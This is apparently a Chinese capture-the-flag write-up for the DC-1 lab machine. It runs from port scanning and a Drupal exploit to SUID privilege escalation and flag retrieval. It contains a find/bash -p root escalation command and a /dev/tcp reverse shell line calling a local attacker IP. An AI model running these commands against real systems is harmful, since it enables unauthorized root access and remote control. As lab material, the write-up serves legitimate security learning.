DC-1
1 信息收集
用scaninfo扫一下端口和服务
{"ip":"192.168.1.108","port":22,"service":"ssh","Banner":"SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u7\\x0d\\x0a","url":""}
{"ip":"192.168.1.108","port":56895,"service":"nfs","Banner":"","url":""}
{"ip":"192.168.1.108","port":80,"service":"http","Banner":"","url":"http://192.168.1.108:80"}
{"ip":"192.168.1.108","port":111,"service":"","Banner":"","url":""}
{"url":"http://192.168.1.108:80","StatusCode":200,"Title":"WelcometoDrupalSite|DrupalSite","HeaderDigest":"server:Apache/2.2.22 (Debian)","Length":7669,"KeywordFinger":"PHP","HashFinger":""}
开了ssh,nfs,http(php+linux),
2 尝试nfs利用
用rpcinfo扫描
┌──(root㉿kali)-[/home/kali]
└─# rpcinfo -p 192.168.1.108
program vers proto port service
100000 4 tcp 111 portmapper
100000 3 tcp 111 portmapper
100000 2 tcp 111 portmapper
100000 4 udp 111 portmapper
100000 3 udp 111 portmapper
100000 2 udp 111 portmapper
100024 1 udp 39932 status
100024 1 tcp 56895 status
尝试利用但报错clnt_create: RPC: Program not registered,搜索发现是服务部署问题,放弃
3 尝试web漏洞
Drupal是个通用框架,直接寻找可用漏洞,挨个尝试,发现#1可以利用
目标系统信息,linux + php + www-data权限
4 提权
尝试使用提权插件,但未发现可用插件
尝试手动提权
使用LinEnum进行信息收集
发现可以通过SUID进行提权
由于euid(excute user id)和uid不一致,使用suid提权时uid为root,但euid仍然为www-data,所以反弹的shell还是www-data权限,这里可以使用bash -p参数进行反弹shell,bash -p参数在执行时如果发现euid和uid不一致,会将euid强制重置为uid
截图里的命令打错了,以下面的命令为准
find t.php -exec /bin/bash -p \;
/bin/bash -p -i >& /dev/tcp/192.168.1.110/1111 0>&1
拿到root权限
5 拿flag
# flag1.txt
Every good CMS needs a config file - and so do you.
这里有flag2,提示需要用到配置文件,搜了下drupal配置文件的位置
问了下,要改admin的密码,然后登录,我为了省事直接把数据库dump下来了,里面有flag3
之前在做信息收集的时候,有用户flag4,拿到flag4
以及thefinalflag
